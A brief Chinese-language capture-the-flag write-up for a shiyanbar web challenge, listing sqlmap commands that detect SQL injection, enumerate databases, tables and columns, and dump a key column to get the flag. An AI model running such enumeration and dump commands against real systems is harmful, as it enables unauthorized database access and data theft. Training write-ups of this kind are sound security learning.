1. 程式人生 > >實驗吧web

實驗吧web

題目:

很明顯。過年過節不送禮,送禮就送這個

格式:

解題連結: http://ctf5.shiyanbar.com/8/index.php?id=1

首先用sqlmap判斷是否存在sql注入

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"

然後爆出其資料庫名稱

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"  --dbs

爆出其表

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1

" -D my_db --tables

爆出欄位

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

得到flage